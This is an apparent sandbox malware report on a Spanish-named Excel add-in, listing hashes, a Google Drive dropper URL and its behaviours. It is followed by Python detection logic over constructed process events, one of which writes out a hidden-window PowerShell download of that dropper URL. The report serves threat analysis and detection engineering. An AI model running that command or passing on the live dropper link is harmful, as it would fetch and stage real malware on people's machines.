General

  • Target

    Comprobantedepago.xlam

  • Size

    699KB

  • Sample

    241023-lxrcvstcpf

  • MD5

    1de5993784350cdba2bdc8824591a452

  • SHA1

    921e7dd625709bbef00860eb23c9bc279e3483d6

  • SHA256

    d60d2060e90ae46091f0d4d2cd819c87ab7832b50ed4ba05912281ec084d7748

  • SHA512

    db4e29d683e16fde32f14d5e9229b29ca20fac16f247f36b3dfd69f137bddadd0d4f6f39cbe5b0c07b26d6c979c1bfb8d97dd93bf8c6852f7ec3e7069e976cfa

  • SSDEEP

    12288:TTDYEkIOk9iewJ5IU5Y3LoIfpo3Scp1ixHXmYWN0jPvxfScWgGYDpBY3:fDYVkQT5IP7oXCcfixBWN0jPvxfCag3

Score
10/10

Malware Config

Extracted

  • Language

    ps1

  • Deobfuscated

  • URLs

    ps1.dropper
    https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

    exe.dropper
    https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp

Targets

    • Target

      Comprobantedepago.xlam

    • Blocklisted process makes network request

    • Command and Scripting Interpreter: PowerShell

      Runs PowerShell with its display window hidden.

    • Legitimate hosting services abused for malware hosting/C2

    • Drops file in System32 directory
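The four behaviours listed above map directly onto process-creation and file-creation telemetry, so a detection engineer would normally turn them into a rule. What follows is an added example written for this page, not part of the sandbox report: Python detection logic run over constructed Sysmon-style events. The event fields, executable paths, the PowerShell command line and the dropped file name in EVENTS are assumptions for illustration (the report does not show the real command line); only the target name and the Google Drive download URL are taken from the report. The example also pulls the Drive file id out of the download URL so it can be recorded as an IOC next to the file hashes.

```python
import re
from urllib.parse import parse_qs, urlparse

# Constructed Sysmon-style events for illustration. They are NOT telemetry from
# the sandbox run; paths, command lines and the dropped file name are assumptions.
# Only the target name and the Google Drive URL come from the report.
EVENTS = [
    {"type": "process",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE" Comprobantedepago.xlam'},
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     # Assumed command line: a hidden-window PowerShell fetching the ps1 dropper URL from the report.
     "cmdline": (r'powershell.exe -NoP -W Hidden -C "iwr '
                 r"'https://drive.google.com/uc?export=download&id=1-Wdgeq0fX9aApdlSW9dln1Pc_KEGpfHp'"
                 r' -OutFile $env:TEMP\s.ps1"')},
    {"type": "file",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Windows\System32\payload.exe"},   # assumed file name
    {"type": "process",                               # benign control event
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": "powershell.exe -Command Get-Process"},
]

OFFICE_HOSTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
SYSTEM32 = "c:\\windows\\system32\\"
# -WindowStyle Hidden and its short form -W Hidden, case-insensitive.
HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I)
# Google Drive direct-download URLs; stops at whitespace or quoting characters.
DRIVE_URL = re.compile(r"https?://drive\.google\.com/uc\?[^\s'\"<>]+", re.I)


def basename(path):
    """Lower-cased final path component, tolerant of either separator."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def drive_file_ids(text):
    """Google Drive file ids referenced by uc?export=download URLs in text (IOC extraction)."""
    ids = []
    for url in DRIVE_URL.findall(text):
        ids.extend(parse_qs(urlparse(url).query).get("id", []))
    return ids


def classify(event):
    """Names of the report's behaviours that a single event exhibits, in fixed order."""
    hits = []
    image = basename(event["image"])
    cmdline = event.get("cmdline", "")
    if event["type"] == "process":
        if image in SCRIPT_HOSTS and basename(event.get("parent_image", "")) in OFFICE_HOSTS:
            hits.append("office_spawns_powershell")
        if image in SCRIPT_HOSTS and HIDDEN_WINDOW.search(cmdline):
            hits.append("hidden_powershell_window")
        if drive_file_ids(cmdline):
            hits.append("legit_hosting_download")
    elif event["type"] == "file":
        if image in SCRIPT_HOSTS and event["target"].lower().startswith(SYSTEM32):
            hits.append("drops_file_in_system32")
    return hits


def scan(events):
    """(index, hits) for every event that matches at least one behaviour."""
    results = []
    for i, event in enumerate(events):
        hits = classify(event)
        if hits:
            results.append((i, hits))
    return results


if __name__ == "__main__":
    for i, hits in scan(EVENTS):
        print(i, EVENTS[i]["type"], ", ".join(hits))
    print("drive ids:", drive_file_ids(EVENTS[1]["cmdline"]))
```

The parent-process check is the one that separates this chain from ordinary administrative PowerShell: the control event (powershell.exe started from explorer.exe without a hidden window or a Drive URL) produces no hits, while the Excel-spawned hidden-window download matches three behaviours at once. In production the System32 check should also cover SysWOW64, and the Drive id should be matched against threat-intel feeds rather than only extracted.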

MITRE ATT&CK Enterprise v15

Tasks